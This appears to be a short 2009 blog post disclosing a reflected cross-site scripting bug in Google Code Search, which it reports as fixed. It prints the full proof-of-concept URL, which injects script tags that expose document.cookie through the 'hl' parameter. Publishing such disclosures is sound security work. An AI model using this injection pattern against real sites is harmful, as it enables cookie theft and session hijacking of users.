New critical XSS bug in Google Code Search

Jun 21, 2009 | Category: Google Vulns

xados has discovered a vulnerability in Google Code Search, which could be exploited by malicious people to conduct XSS attacks.

XSS:

http://www.google.com/codesearch/p?hl=en%22;//%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%22%3E%3Cscript%3Ealert(navigator.userAgent)%3C/script%3E&sa=N&cd=2&ct=By_XaDoS

STATUS: 21 june 5:40 p.m.FIXED

xss_google_code_search

Other XSS by xados:

http://xssed.com/archive/author=xados/
http://www.googlebig.com/forum/search.php?action=results&sid=6f4a70bca1c0f2bee310e3e1745a9d94

Related posts:

  1. New critical XSS bug in GoogleLabs
  2. Three new XSS of Google: Knol, Books and Google!
  3. XSS google.com
  4. Google accounts SSL login page suffers from highly critical XSS
  5. Gmail.it – Nuova casella di posta, travata vulnerabilita’ XSS

Bookmark and Share
Permalink Comments (0) Jun 21, 2009

Leave a Reply with your Google Account